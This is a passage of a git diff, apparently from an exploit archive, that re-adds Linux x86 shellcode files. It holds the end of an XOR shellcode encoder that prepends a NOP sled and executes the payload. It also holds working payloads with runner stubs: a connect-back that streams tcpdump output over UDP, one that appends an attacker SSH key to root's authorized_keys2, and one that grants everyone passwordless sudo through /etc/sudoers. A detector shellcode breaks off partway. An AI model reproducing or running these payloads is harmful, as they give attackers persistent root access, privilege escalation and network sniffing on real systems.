NULL); + seed = tm.tv_sec + tm.tv_usec; srandom(seed); + return (random() % i) +1; +} + +void usage() { + printf("Usage: sh3llc0der [options] shellcode\n"); + printf("\tv - verbose\n"); + printf("\to [outfile] - out file (stdout is default)\n"); + printf("\tn [size] - generate with NOP sled of size length (minus decoder)\n"); + printf("\tr - randomize NOP sled with other operations\n"); + printf("\t? - this crud\n"); +} + +int main(int argc, char **argv) { + Elf32_Ehdr elfhdr; Elf32_Phdr dataseg; Elf32_Phdr txtseg; + + int found_txt_seg = 0; int i = 0; int r = 0; int len = 0; int key = 0; + int include_noop_instructions = 0; int noop_length = 0; int use_nop_randomization = 0; + int write_file = 0; int is_verbose = 0; + unsigned char c; unsigned char *b = NULL; unsigned char *nb = NULL; + char *upayload = NULL; char *outfile = NULL; + unsigned int payload_offset = 0; unsigned int payload_size = 0; + int (*func)(); + + opterr = 0; int option = 1; + while((option = getopt(argc, argv, "vrn:o:?")) != -1 ) { + switch(option) { + case 'v': + is_verbose = 1; + break; + case 'o': + write_file = 1; + outfile = optarg; + if(outfile != NULL) { printf("[+] writing shellcode to: %s\n", outfile); } + break; + case 'n': + if(optarg != NULL) noop_length = atoi(optarg); else break; + include_noop_instructions = 1; + break; + case 'r': + use_nop_randomization = 1; + break; + case '?': + usage(); exit(0); + break; + default: + // nothing + break; + }; + } + + if(argc < 2) { usage(); exit(0); } + printf("[+] sh3llc0der - sm4x 2008\n"); + + upayload = argv[argc-1]; if(upayload == outfile) { printf("[-] ummm no\n"); usage(); exit(-1); } + + if(is_verbose) { printf("[?] opening %s\n", upayload); } + FILE *p = fopen(upayload, "rb"); + if(p == NULL) { printf("[-] null file - nice try\n"); exit(-1); } + + fseek(p, 0, SEEK_END); + len = ftell(p); rewind(p); + if(len <= 0) { printf("[-] 0 len file - nice try\n"); exit(-1); } + + /* adjust our noop length for the decoder size */ + + if(include_noop_instructions && noop_length > sizeof(decoder)) { noop_length -= sizeof(decoder); } + printf("[+] shellcode length: %d Bytes\n", len); + + b = (char *) malloc(sizeof(char)*len); + if(b == NULL) { printf("[-] unable to buffer shellcode - nice try again!\n"); exit(-1); } + + if(is_verbose) { printf("[?] reading %s....\n", upayload); } + r = fread(b, 1, len, p); + if(r != len) { printf("[-] **warning** - unable to load the entire file into buffer!\n"); } + fclose(p); p = NULL; + if(is_verbose) { printf("[?] file %s seems ok with %d size\n", upayload, len); } + + /* get our ELF header out of the binary */ + memcpy(&elfhdr, (void *)b, sizeof(Elf32_Ehdr)); + + printf("[+] Starting address: 0x%x\n", elfhdr.e_entry); + /* seek to our offset */ + printf("[+] Offset @ 0x%x\n", elfhdr.e_phoff); + + /* loop for seg offset (you're gonna crash here if its not a proper elf binary -> don't really care!! lol) */ + for(i = 0;i < elfhdr.e_phnum; i++) { + /* copy in our txtseg what we think* to be the appropriate header (p_offset == 0 means text) */ + memcpy(&txtseg, &b[(sizeof(Elf32_Ehdr)) + (i * sizeof(Elf32_Phdr))], sizeof(Elf32_Phdr)); + if(txtseg.p_filesz > 0 && txtseg.p_offset == 0) { + printf("[+] .text segment found, len: 0x%x|0x%x @ V:0x%x P:0x%x off: 0x%x\n", + txtseg.p_filesz, txtseg.p_memsz, txtseg.p_vaddr, txtseg.p_vaddr, txtseg.p_offset); + found_txt_seg = 1; break; + } else { + found_txt_seg = 0; + } + } if(!found_txt_seg) { printf("[-] could not find .text segment for encoding!\n"); exit(-1); } + + /* calculations for start of .text with offset (usually 0) */ + payload_size = (txtseg.p_vaddr + txtseg.p_filesz) - elfhdr.e_entry; + payload_offset = (txtseg.p_offset + txtseg.p_filesz) - payload_size; + + printf("[+] calc offset: 0x%x | 0x%x -> (SHELLCODE SIZE: %d Bytes)\n", payload_offset, payload_size, payload_size); + + int new_payload_size = noop_length+payload_size+sizeof(decoder)-1; + + nb = (char *) malloc(sizeof(char) * new_payload_size); + if(nb == NULL) { printf("[-] error creating copy payload - nice try\n"); exit(-1); } + memset(nb, 0x0, sizeof(char) * new_payload_size); // just in case - clean it out + + // ensure we have a NULL free xor'd shellcode -> keep trying until we do + int is_null = 0; int warn = 0; int attempts = 0; + while(1) { + if(attempts > 20) { printf("[-] somthing is very wrong!! please check the binary\n"); exit(-1); } + key = getkey(255); + for(i = 0; i < payload_size; i++) { + c = b[payload_offset+i]; c ^= key; + if(c == 0x00) { printf("[!] ERR: 0x%x on key: %d\n", b[payload_offset+i], key); is_null = 1; break; } + if(c == 0x0a || c == 0x0d) { printf("[!] WARN: 0x%x on key: %d\n", b[payload_offset+i], key); warn =1; } + } attempts++; + if(is_null) { printf("[-] NULL found.. regenerating now... try=%d\n", attempts); is_null = 0; usleep(100); continue; } + + if(warn) { printf("[!] WARN: invalid hex was found in this shellcode -> this may* not pass some string functions!\n"); } + if(is_verbose) { printf("[?] running xor-enc on payload now (key=%d @ %x attempts)...\n", key, attempts); } + + /* fill our new buffer -nb*/ + for(i = 0; i < payload_size; i++) { + nb[noop_length+sizeof(decoder)-1+i] = b[payload_offset+i]; + if(is_verbose) { printf("\\x%.2x", b[payload_offset+i]); } + nb[noop_length+sizeof(decoder)-1+i] ^= key; + } break; + } if(is_verbose) { printf("\n"); } + if(!warn) { printf("[+] done xor-enc on payload (NULL FREE)...\n"); } else { printf("[!] (check warnings!!) some problems with xor-enc (NULL FREE)...\n"); } + + for(i = 0; i < noop_length+payload_size-1; i++) printf("\\x%.2x", nb[sizeof(decoder)+i]); + + /* we need to set our primary instructions to decode with xor */ + decoder[6] = payload_size; decoder[11] = key; + + printf("\n"); + if(include_noop_instructions) { + printf("[+] prepending %d (%d = minus decoder len) NOOPs...\n", noop_length+sizeof(decoder), noop_length); + // minus the decoder size + if(use_nop_randomization) { + for(i = 0; i < noop_length; i++) { + int p = getkey(5); + // hardly random - but change to modify the primary sled sig + switch((int)p) { + case 1: nb[i] = 0x90; break; + case 2: nb[i] = 0x40; nb[i+1] = 0x48; i++; break; + case 3: nb[i] = 0x50; break; + case 4: nb[i] = 0x58; break; + case 5: nb[i] = 0x99; break; + default: nb[i] = 0x90; break; + }; + } + } else { + for(i = 0; i < noop_length; i++) nb[i] = 0x90; + } + } + + printf("[+] adding decoder of %d Bytes (total= %d Bytes)...\n", sizeof(decoder), sizeof(decoder)+payload_size); + memcpy(nb+noop_length, decoder, sizeof(decoder)-1); + for(i = 0; i < noop_length+payload_size+sizeof(decoder)-1; i++) printf("\\x%.2x", nb[i]); + printf("\n"); + + if(write_file) { + printf("[+] writing payload to: %s\n", outfile); + FILE *w = fopen(outfile, "wb"); + if(w == NULL) { printf("[-] Unable to open file: %s\n", outfile); goto continue_test; } + int bytes = fprintf(w, nb, sizeof(decoder)+payload_size, 0); + fclose(w); + printf("[+] done %d written.\n", bytes); + } + + continue_test: + printf("[+] testing payload now ...\n"); + printf("[-] if shellcode tests bad something has gone horribly wrong - do NOT continue with payload...\n"); + + /* if this mashes out ie: seg fault -> then DO NOT use the shellcode on an exploit -> ur gonna crash the shit */ + func = (int (*)()) nb; + (int)(*func)(); + + // should never get here really + + cleanup: + if(p != NULL) fclose(p); + return 0; +} + // milw0rm.com [2008-12-09] \ No newline at end of file diff --git a/platforms/lin_x86/shellcode/13329.c b/platforms/lin_x86/shellcode/13329.c index 861a98053..9355edc6c 100755 --- a/platforms/lin_x86/shellcode/13329.c +++ b/platforms/lin_x86/shellcode/13329.c @@ -1,96 +1,96 @@ -/* - linux/x86 connect-back port UDP/54321 & dup2 & - fork() & execve() /usr/bin/tcpdump -iany -w- "port ! 54321" - 151 bytes - by XenoMuta - _ __ __ ___ __ - | |/ /__ ____ ____ / |/ /_ __/ /_____ _ - | / _ \/ __ \/ __ \/ /|_/ / / / / __/ __ `/ - / / __/ / / / /_/ / / / / /_/ / /_/ /_/ / - /_/|_\___/_/ /_/\____/_/ /_/\__,_/\__/\__,_/ - - xenomuta [ arroba ] phreaker [ punto ] net - - http://xenomuta.tuxfamily.org/ - Methylxantina 256mg - - - God bless you all - - -*/ -unsigned char sc[] = -// <_start>: -"\x6a\x66" // push $0x66 ; socketcall() -"\x58" // pop %eax ; para setear el socket -"\x6a\x01" // push $0x1 -"\x5b" // pop %ebx -"\x31\xc9" // xor %ecx,%ecx -"\x51" // push %ecx -"\x6a\x02" // push $0x2 ; SOCK_DGRAM (udp) -"\x6a\x02" // push $0x2 -"\x89\xe1" // mov %esp,%ecx -"\xcd\x80" // int $0x80 -// IP: 127.1.1.1 -"\x68\x7f\x01\x01\x01" // push $0x101017f -// Port: 54321 -"\x66\x68\xd4\x31" // pushw $0x31d4 -"\x66\x31\xc9" // xor %cx,%cx -"\x80\xc1\x02" // xadd $0x2,%cl -"\x66\x51" // push %cx -"\x89\xe1" // mov %esp,%ecx -"\x6a\x10" // push $0x10 -"\x51" // push %ecx -"\x50" // push %eax -"\x89\xe1" // mov %esp,%ecx -"\x89\xc6" // mov %eax,%esi -"\xb0\x66" // mov $0x66,%al ; socketcall () -"\x80\xc3\x02" // add $0x2,%bl ; para connect() -"\xcd\x80" // int $0x80 -"\x87\xde" // xchg %ebx,%esi -"\x6a\x01" // push $0x1 -"\x59" // pop %ecx -"\x6a\x3f" // push $0x3f ; dup2(socket, stdout) -"\x58" // pop %eax -"\xcd\x80" // int $0x80 -"\x31\xd2" // xor %edx,%edx -"\x6a\x02" // push $0x2 ; fork() -"\x58" // pop %eax -"\xcd\x80" // int $0x80 -"\x39\xd0" // cmp %edx,%eax ; el hijo sobrevive -"\x74\x05" // je 0x4d <_child> -"\x6a\x01" // push $0x1 ; adios papa -"\x58" // pop %eax -"\xcd\x80" // int $0x80 -//<_child>: -"\x6a\x0b" // push $0xb ; execve() tcpdump -iany -w- "port ! 54321" -"\x58" // pop %eax ; sniffea todo menos a mi mismo. -"\x52" // push %edx -"\x68\x34\x33\x32\x31" // push $0x31323334 ; "port ! 54321" -"\x68\x20\x21\x20\x35" // push $0x35202120 -"\x68\x70\x6f\x72\x74" // push $0x74726f70 -"\x89\xe7" // mov %esp,%edi -"\x52" // push %edx -"\x6a\x2d" // push $0x2d ; -w- ( escribe a stdout ) -"\x66\x68\x2d\x77" // pushw $0x772d -"\x89\xe6" // mov %esp,%esi -"\x52" // push %edx -"\x6a\x79" // push $0x79 ; -iany (todas las interfaces ) -"\x68\x2d\x69\x61\x6e" // push $0x6e61692d -"\x89\xe1" // mov %esp,%ecx -"\x52" // push %edx -"\x6a\x70" // push $0x70 -"\x68\x70\x64\x75\x6d" // push $0x6d756470 ; /usr/bin/tcpdump -"\x68\x6e\x2f\x74\x63" // push $0x63742f6e -"\x68\x2f\x73\x62\x69" // push $0x6962732f -"\x68\x2f\x75\x73\x72" // push $0x7273752f -"\x89\xe3" // mov %esp,%ebx -"\x52" // push %edx -"\x57" // push %edi -"\x56" // push %esi -"\x51" // push %ecx -"\x53" // push %ebx -"\x89\xe1" // mov %esp,%ecx -"\xcd\x80"; // int $0x80 - - -main(){(*(void (*)()) sc)();} - +/* + linux/x86 connect-back port UDP/54321 & dup2 & + fork() & execve() /usr/bin/tcpdump -iany -w- "port ! 54321" + 151 bytes + by XenoMuta + _ __ __ ___ __ + | |/ /__ ____ ____ / |/ /_ __/ /_____ _ + | / _ \/ __ \/ __ \/ /|_/ / / / / __/ __ `/ + / / __/ / / / /_/ / / / / /_/ / /_/ /_/ / + /_/|_\___/_/ /_/\____/_/ /_/\__,_/\__/\__,_/ + + xenomuta [ arroba ] phreaker [ punto ] net + + http://xenomuta.tuxfamily.org/ - Methylxantina 256mg + + - God bless you all - + +*/ +unsigned char sc[] = +// <_start>: +"\x6a\x66" // push $0x66 ; socketcall() +"\x58" // pop %eax ; para setear el socket +"\x6a\x01" // push $0x1 +"\x5b" // pop %ebx +"\x31\xc9" // xor %ecx,%ecx +"\x51" // push %ecx +"\x6a\x02" // push $0x2 ; SOCK_DGRAM (udp) +"\x6a\x02" // push $0x2 +"\x89\xe1" // mov %esp,%ecx +"\xcd\x80" // int $0x80 +// IP: 127.1.1.1 +"\x68\x7f\x01\x01\x01" // push $0x101017f +// Port: 54321 +"\x66\x68\xd4\x31" // pushw $0x31d4 +"\x66\x31\xc9" // xor %cx,%cx +"\x80\xc1\x02" // xadd $0x2,%cl +"\x66\x51" // push %cx +"\x89\xe1" // mov %esp,%ecx +"\x6a\x10" // push $0x10 +"\x51" // push %ecx +"\x50" // push %eax +"\x89\xe1" // mov %esp,%ecx +"\x89\xc6" // mov %eax,%esi +"\xb0\x66" // mov $0x66,%al ; socketcall () +"\x80\xc3\x02" // add $0x2,%bl ; para connect() +"\xcd\x80" // int $0x80 +"\x87\xde" // xchg %ebx,%esi +"\x6a\x01" // push $0x1 +"\x59" // pop %ecx +"\x6a\x3f" // push $0x3f ; dup2(socket, stdout) +"\x58" // pop %eax +"\xcd\x80" // int $0x80 +"\x31\xd2" // xor %edx,%edx +"\x6a\x02" // push $0x2 ; fork() +"\x58" // pop %eax +"\xcd\x80" // int $0x80 +"\x39\xd0" // cmp %edx,%eax ; el hijo sobrevive +"\x74\x05" // je 0x4d <_child> +"\x6a\x01" // push $0x1 ; adios papa +"\x58" // pop %eax +"\xcd\x80" // int $0x80 +//<_child>: +"\x6a\x0b" // push $0xb ; execve() tcpdump -iany -w- "port ! 54321" +"\x58" // pop %eax ; sniffea todo menos a mi mismo. +"\x52" // push %edx +"\x68\x34\x33\x32\x31" // push $0x31323334 ; "port ! 54321" +"\x68\x20\x21\x20\x35" // push $0x35202120 +"\x68\x70\x6f\x72\x74" // push $0x74726f70 +"\x89\xe7" // mov %esp,%edi +"\x52" // push %edx +"\x6a\x2d" // push $0x2d ; -w- ( escribe a stdout ) +"\x66\x68\x2d\x77" // pushw $0x772d +"\x89\xe6" // mov %esp,%esi +"\x52" // push %edx +"\x6a\x79" // push $0x79 ; -iany (todas las interfaces ) +"\x68\x2d\x69\x61\x6e" // push $0x6e61692d +"\x89\xe1" // mov %esp,%ecx +"\x52" // push %edx +"\x6a\x70" // push $0x70 +"\x68\x70\x64\x75\x6d" // push $0x6d756470 ; /usr/bin/tcpdump +"\x68\x6e\x2f\x74\x63" // push $0x63742f6e +"\x68\x2f\x73\x62\x69" // push $0x6962732f +"\x68\x2f\x75\x73\x72" // push $0x7273752f +"\x89\xe3" // mov %esp,%ebx +"\x52" // push %edx +"\x57" // push %edi +"\x56" // push %esi +"\x51" // push %ecx +"\x53" // push %ebx +"\x89\xe1" // mov %esp,%ecx +"\xcd\x80"; // int $0x80 + + +main(){(*(void (*)()) sc)();} + // milw0rm.com [2008-11-23] \ No newline at end of file diff --git a/platforms/lin_x86/shellcode/13330.c b/platforms/lin_x86/shellcode/13330.c index d9f748997..b9404364a 100755 --- a/platforms/lin_x86/shellcode/13330.c +++ b/platforms/lin_x86/shellcode/13330.c @@ -1,104 +1,104 @@ -/* - linux/x86 shellcode to append rsa key to /root/.ssh/authorized_keys2 - keys found at http://xenomuta.tuxfamily.org/exploits/authkey/ - ssh -i id_rsa_pwn root@pwned-host - - 295 bytes - by XenoMuta - _ __ __ ___ __ - | |/ /__ ____ ____ / |/ /_ __/ /_____ _ - | / _ \/ __ \/ __ \/ /|_/ / / / / __/ __ `/ - / / __/ / / / /_/ / / / / /_/ / /_/ /_/ / - /_/|_\___/_/ /_/\____/_/ /_/\__,_/\__/\__,_/ - - xenomuta [ arroba ] phreaker [ punto ] net - - http://xenomuta.tuxfamily.org/ - Methylxantina 256mg - - - God bless you all - - -*/ -unsigned char sc[] = -//<_start>: -"\x31\xd2" // xor %edx,%edx -"\x52" // push %edx -"\x68\x65\x79\x73\x32" // push $0x32737965 ; /root/.ssh/authorized_keys2 -"\x68\x65\x64\x5f\x6b" // push $0x6b5f6465 -"\x68\x6f\x72\x69\x7a" // push $0x7a69726f -"\x68\x61\x75\x74\x68" // push $0x68747561 -"\x68\x73\x73\x68\x2f" // push $0x2f687373 -"\x68\x74\x2f\x2f\x2e" // push $0x2e2f2f74 -"\x68\x2f\x72\x6f\x6f" // push $0x6f6f722f -"\x89\xe3" // mov %esp,%ebx -"\x66\xb9\x41\x04" // mov $0x441,%cx ; O_CREAT | O_APPEND | O_WRONLY -//<_open>: -"\x6a\x05" // push $0x5 ; sys_open() -"\x58" // pop %eax -"\xcd\x80" // int $0x80 -//<_write>: -"\x93" // xchg %eax,%ebx -"\x89\xe6" // mov %esp,%esi -"\x31\xd2" // xor %edx,%edx -"\x52" // push %edx -"\x6a\x0a" // push $0xa -"\x68\x20\x78\x78\x78" // push $0x78787820 ; contenido de id_rsa_pwn.pub -"\x68\x31\x35\x54\x4a" // push $0x4a543531 -"\x68\x56\x39\x48\x57" // push $0x57483956 -"\x68\x6d\x75\x2b\x38" // push $0x382b756d -"\x68\x31\x35\x64\x31" // push $0x31643531 -"\x68\x64\x2f\x71\x69" // push $0x69712f64 -"\x68\x52\x4b\x61\x79" // push $0x79614b52 -"\x68\x70\x70\x79\x6e" // push $0x6e797070 -"\x68\x35\x46\x31\x6d" // push $0x6d314635 -"\x68\x55\x64\x5a\x35" // push $0x355a6455 -"\x68\x4d\x2b\x4c\x63" // push $0x634c2b4d -"\x68\x38\x59\x41\x6d" // push $0x6d415938 -"\x68\x4d\x42\x50\x79" // push $0x7950424d -"\x68\x4c\x44\x4d\x58" // push $0x584d444c -"\x68\x41\x34\x31\x38" // push $0x38313441 -"\x68\x65\x33\x76\x4d" // push $0x4d763365 -"\x68\x48\x6f\x78\x77" // push $0x77786f48 -"\x68\x34\x6d\x46\x36" // push $0x36466d34 -"\x68\x48\x39\x6f\x39" // push $0x396f3948 -"\x68\x56\x59\x48\x6a" // push $0x6a485956 -"\x68\x4b\x41\x74\x6d" // push $0x6d74414b -"\x68\x70\x7a\x64\x71" // push $0x71647a70 -"\x68\x50\x2b\x76\x4d" // push $0x4d762b50 -"\x68\x6c\x47\x51\x43" // push $0x4351476c -"\x68\x50\x68\x4f\x32" // push $0x324f6850 -"\x68\x4d\x37\x48\x35" // push $0x3548374d -"\x68\x76\x6b\x6c\x47" // push $0x476c6b76 -"\x68\x37\x74\x4f\x35" // push $0x354f7437 -"\x68\x54\x63\x6e\x77" // push $0x776e6354 -"\x68\x36\x63\x77\x65" // push $0x65776336 -"\x68\x6d\x62\x64\x71" // push $0x7164626d -"\x68\x4e\x32\x75\x70" // push $0x7075324e -"\x68\x74\x73\x6a\x58" // push $0x586a7374 -"\x68\x41\x47\x45\x41" // push $0x41454741 -"\x68\x49\x77\x41\x41" // push $0x41417749 -"\x68\x41\x41\x41\x42" // push $0x42414141 -"\x68\x63\x32\x45\x41" // push $0x41453263 -"\x68\x61\x43\x31\x79" // push $0x79314361 -"\x68\x42\x33\x4e\x7a" // push $0x7a4e3342 -"\x68\x41\x41\x41\x41" // push $0x41414141 -"\x68\x72\x73\x61\x20" // push $0x20617372 -"\x68\x73\x73\x68\x2d" // push $0x2d687373 -"\x89\xe1" // mov %esp,%ecx -"\xb2\xa9" // mov $0xa9,%dl -"\x6a\x04" // push $0x4 ; sys_write() -"\x58" // pop %eax -"\xcd\x80" // int $0x80 -"\x34\xaf" // xor $0xaf,%al ; 0xa9 xor 0xaf = 0x6 ( sys_close() ) -"\xcd\x80" // int $0x80 -"\x04\x0f" // add $0xf,%al ; sys_chmod() -"\x89\xf3" // mov %esi,%ebx -"\x66\xb9\x80\x01" // mov $0x180,%cx ; 0600 para que ssh no se queje -"\xcd\x80" // int $0x80 -"\x6a\x01" // push $0x1 ; adios exit -"\x58" // pop %eax -"\xcd\x80"; // int $0x80 - -main(){printf("%d bytes\n", strlen(sc));} -//main(){(*(void (*)()) sc)();} - +/* + linux/x86 shellcode to append rsa key to /root/.ssh/authorized_keys2 + keys found at http://xenomuta.tuxfamily.org/exploits/authkey/ + ssh -i id_rsa_pwn root@pwned-host + + 295 bytes + by XenoMuta + _ __ __ ___ __ + | |/ /__ ____ ____ / |/ /_ __/ /_____ _ + | / _ \/ __ \/ __ \/ /|_/ / / / / __/ __ `/ + / / __/ / / / /_/ / / / / /_/ / /_/ /_/ / + /_/|_\___/_/ /_/\____/_/ /_/\__,_/\__/\__,_/ + + xenomuta [ arroba ] phreaker [ punto ] net + + http://xenomuta.tuxfamily.org/ - Methylxantina 256mg + + - God bless you all - + +*/ +unsigned char sc[] = +//<_start>: +"\x31\xd2" // xor %edx,%edx +"\x52" // push %edx +"\x68\x65\x79\x73\x32" // push $0x32737965 ; /root/.ssh/authorized_keys2 +"\x68\x65\x64\x5f\x6b" // push $0x6b5f6465 +"\x68\x6f\x72\x69\x7a" // push $0x7a69726f +"\x68\x61\x75\x74\x68" // push $0x68747561 +"\x68\x73\x73\x68\x2f" // push $0x2f687373 +"\x68\x74\x2f\x2f\x2e" // push $0x2e2f2f74 +"\x68\x2f\x72\x6f\x6f" // push $0x6f6f722f +"\x89\xe3" // mov %esp,%ebx +"\x66\xb9\x41\x04" // mov $0x441,%cx ; O_CREAT | O_APPEND | O_WRONLY +//<_open>: +"\x6a\x05" // push $0x5 ; sys_open() +"\x58" // pop %eax +"\xcd\x80" // int $0x80 +//<_write>: +"\x93" // xchg %eax,%ebx +"\x89\xe6" // mov %esp,%esi +"\x31\xd2" // xor %edx,%edx +"\x52" // push %edx +"\x6a\x0a" // push $0xa +"\x68\x20\x78\x78\x78" // push $0x78787820 ; contenido de id_rsa_pwn.pub +"\x68\x31\x35\x54\x4a" // push $0x4a543531 +"\x68\x56\x39\x48\x57" // push $0x57483956 +"\x68\x6d\x75\x2b\x38" // push $0x382b756d +"\x68\x31\x35\x64\x31" // push $0x31643531 +"\x68\x64\x2f\x71\x69" // push $0x69712f64 +"\x68\x52\x4b\x61\x79" // push $0x79614b52 +"\x68\x70\x70\x79\x6e" // push $0x6e797070 +"\x68\x35\x46\x31\x6d" // push $0x6d314635 +"\x68\x55\x64\x5a\x35" // push $0x355a6455 +"\x68\x4d\x2b\x4c\x63" // push $0x634c2b4d +"\x68\x38\x59\x41\x6d" // push $0x6d415938 +"\x68\x4d\x42\x50\x79" // push $0x7950424d +"\x68\x4c\x44\x4d\x58" // push $0x584d444c +"\x68\x41\x34\x31\x38" // push $0x38313441 +"\x68\x65\x33\x76\x4d" // push $0x4d763365 +"\x68\x48\x6f\x78\x77" // push $0x77786f48 +"\x68\x34\x6d\x46\x36" // push $0x36466d34 +"\x68\x48\x39\x6f\x39" // push $0x396f3948 +"\x68\x56\x59\x48\x6a" // push $0x6a485956 +"\x68\x4b\x41\x74\x6d" // push $0x6d74414b +"\x68\x70\x7a\x64\x71" // push $0x71647a70 +"\x68\x50\x2b\x76\x4d" // push $0x4d762b50 +"\x68\x6c\x47\x51\x43" // push $0x4351476c +"\x68\x50\x68\x4f\x32" // push $0x324f6850 +"\x68\x4d\x37\x48\x35" // push $0x3548374d +"\x68\x76\x6b\x6c\x47" // push $0x476c6b76 +"\x68\x37\x74\x4f\x35" // push $0x354f7437 +"\x68\x54\x63\x6e\x77" // push $0x776e6354 +"\x68\x36\x63\x77\x65" // push $0x65776336 +"\x68\x6d\x62\x64\x71" // push $0x7164626d +"\x68\x4e\x32\x75\x70" // push $0x7075324e +"\x68\x74\x73\x6a\x58" // push $0x586a7374 +"\x68\x41\x47\x45\x41" // push $0x41454741 +"\x68\x49\x77\x41\x41" // push $0x41417749 +"\x68\x41\x41\x41\x42" // push $0x42414141 +"\x68\x63\x32\x45\x41" // push $0x41453263 +"\x68\x61\x43\x31\x79" // push $0x79314361 +"\x68\x42\x33\x4e\x7a" // push $0x7a4e3342 +"\x68\x41\x41\x41\x41" // push $0x41414141 +"\x68\x72\x73\x61\x20" // push $0x20617372 +"\x68\x73\x73\x68\x2d" // push $0x2d687373 +"\x89\xe1" // mov %esp,%ecx +"\xb2\xa9" // mov $0xa9,%dl +"\x6a\x04" // push $0x4 ; sys_write() +"\x58" // pop %eax +"\xcd\x80" // int $0x80 +"\x34\xaf" // xor $0xaf,%al ; 0xa9 xor 0xaf = 0x6 ( sys_close() ) +"\xcd\x80" // int $0x80 +"\x04\x0f" // add $0xf,%al ; sys_chmod() +"\x89\xf3" // mov %esi,%ebx +"\x66\xb9\x80\x01" // mov $0x180,%cx ; 0600 para que ssh no se queje +"\xcd\x80" // int $0x80 +"\x6a\x01" // push $0x1 ; adios exit +"\x58" // pop %eax +"\xcd\x80"; // int $0x80 + +main(){printf("%d bytes\n", strlen(sc));} +//main(){(*(void (*)()) sc)();} + // milw0rm.com [2008-11-23] \ No newline at end of file diff --git a/platforms/lin_x86/shellcode/13331.c b/platforms/lin_x86/shellcode/13331.c index c43155ed2..72a53de72 100755 --- a/platforms/lin_x86/shellcode/13331.c +++ b/platforms/lin_x86/shellcode/13331.c @@ -1,71 +1,71 @@ -/* -Author: Rick -Email: rick2600@hotmail.com - -OS: Linux/x86 -Description: Anyone can run sudo without password - -section .text - global _start - -_start: - - ;open("/etc/sudoers", O_WRONLY | O_APPEND); - xor eax, eax - push eax - push 0x7372656f - push 0x6475732f - push 0x6374652f - mov ebx, esp - mov cx, 0x401 - mov al, 0x05 - int 0x80 - - mov ebx, eax - - ;write(fd, ALL ALL=(ALL) NOPASSWD: ALL\n, len); - xor eax, eax - push eax - push 0x0a4c4c41 - push 0x203a4457 - push 0x53534150 - push 0x4f4e2029 - push 0x4c4c4128 - push 0x3d4c4c41 - push 0x204c4c41 - mov ecx, esp - mov dl, 0x1c - mov al, 0x04 - int 0x80 - - ;close(file) - mov al, 0x06 - int 0x80 - - ;exit(0); - xor ebx, ebx - mov al, 0x01 - int 0x80 - -*/ - -#include -#include - -char code[] = -"\x31\xc0\x50\x68\x6f\x65\x72\x73\x68\x2f\x73\x75\x64" -"\x68\x2f\x65\x74\x63\x89\xe3\x66\xb9\x01\x04\xb0\x05" -"\xcd\x80\x89\xc3\x31\xc0\x50\x68\x41\x4c\x4c\x0a\x68" -"\x57\x44\x3a\x20\x68\x50\x41\x53\x53\x68\x29\x20\x4e" -"\x4f\x68\x28\x41\x4c\x4c\x68\x41\x4c\x4c\x3d\x68\x41" -"\x4c\x4c\x20\x89\xe1\xb2\x1c\xb0\x04\xcd\x80\xb0\x06" -"\xcd\x80\x31\xdb\xb0\x01\xcd\x80"; - -void main(void) { - - void (*shellcode)() = code; - shellcode(); - -} - +/* +Author: Rick +Email: rick2600@hotmail.com + +OS: Linux/x86 +Description: Anyone can run sudo without password + +section .text + global _start + +_start: + + ;open("/etc/sudoers", O_WRONLY | O_APPEND); + xor eax, eax + push eax + push 0x7372656f + push 0x6475732f + push 0x6374652f + mov ebx, esp + mov cx, 0x401 + mov al, 0x05 + int 0x80 + + mov ebx, eax + + ;write(fd, ALL ALL=(ALL) NOPASSWD: ALL\n, len); + xor eax, eax + push eax + push 0x0a4c4c41 + push 0x203a4457 + push 0x53534150 + push 0x4f4e2029 + push 0x4c4c4128 + push 0x3d4c4c41 + push 0x204c4c41 + mov ecx, esp + mov dl, 0x1c + mov al, 0x04 + int 0x80 + + ;close(file) + mov al, 0x06 + int 0x80 + + ;exit(0); + xor ebx, ebx + mov al, 0x01 + int 0x80 + +*/ + +#include +#include + +char code[] = +"\x31\xc0\x50\x68\x6f\x65\x72\x73\x68\x2f\x73\x75\x64" +"\x68\x2f\x65\x74\x63\x89\xe3\x66\xb9\x01\x04\xb0\x05" +"\xcd\x80\x89\xc3\x31\xc0\x50\x68\x41\x4c\x4c\x0a\x68" +"\x57\x44\x3a\x20\x68\x50\x41\x53\x53\x68\x29\x20\x4e" +"\x4f\x68\x28\x41\x4c\x4c\x68\x41\x4c\x4c\x3d\x68\x41" +"\x4c\x4c\x20\x89\xe1\xb2\x1c\xb0\x04\xcd\x80\xb0\x06" +"\xcd\x80\x31\xdb\xb0\x01\xcd\x80"; + +void main(void) { + + void (*shellcode)() = code; + shellcode(); + +} + // milw0rm.com [2008-11-19] \ No newline at end of file diff --git a/platforms/lin_x86/shellcode/13332.c b/platforms/lin_x86/shellcode/13332.c index d8c96b5fd..936422ca0 100755 --- a/platforms/lin_x86/shellcode/13332.c +++ b/platforms/lin_x86/shellcode/13332.c @@ -1,54 +1,54 @@ -/* - ▐▄∙ ▄ ▄▄▄ . ▐ ▄ ∙ ▌ ▄ ·. ▄∙ ▄▌ ▄▄▄▄▄ ▄▄▄· - █▌█▌■ ▀▄.▀· ∙█▌▐█ ■ ·██ ▐███■ █■██▌ ∙██ ▐█ ▀█ - ·██· ▐▀▀■▄ ▐█▐▐▌ ▄█▀▄ ▐█ ▌▐▌▐█· █▌▐█▌ ▐█.■ ▄█▀▀█ - ■▐█·█▌ ▐█▄▄▌ ██▐█▌ ▐█▌.▐▌ ██ ██▌▐█▌ ▐█▄█▌ ▐█▌· ▐█ ■▐▌ - ∙▀▀ ▀▀ ▀▀▀ ▀▀ █■ ▀█▄▀■ ▀▀ █■▀▀▀ ▀▀▀ ▀▀▀ ▀ ▀ - -Ho' Detector (Promiscuous mode detector shellcode) -by XenoMuta -http://xenomuta.tuxfamily.org/ - -This shellcode uses a stupid, yet effective method -for detecting sniffing on all interfaces in linux: -parsing /proc/net/packet, which contains libpcap's -stats and only one line (56 bytes) when not sniffing. -*/ - -char sc[]= -"\x66\x31\xC0" // xor eax,eax -"\x66\x50" // push eax -"\x66\x68\x63\x6B\x65\x74" // push dword 0x74656b63 ; cket -"\x66\x68\x74\x2F\x70\x61" // push dword 0x61702f74 ; t/pa -"\x66\x68\x63\x2F\x6E\x65" // push dword 0x656e2f63 ; c/ne -"\x66\x68\x2F\x70\x72\x6F" // push dword 0x6f72702f ; /pro -"\xB0\x05" // mov al,0x5 ; open() -"\x66\x89\xE3" // mov ebx,esp ; /proc/net/packet -"\x66\x31\xC9" // xor ecx,ecx ; O_RDONLY -"\xCD\x80" // int 0x80 -"\x66\x93" // xchg eax,ebx -"\x6A\x03" // push byte +0x3 ; read() 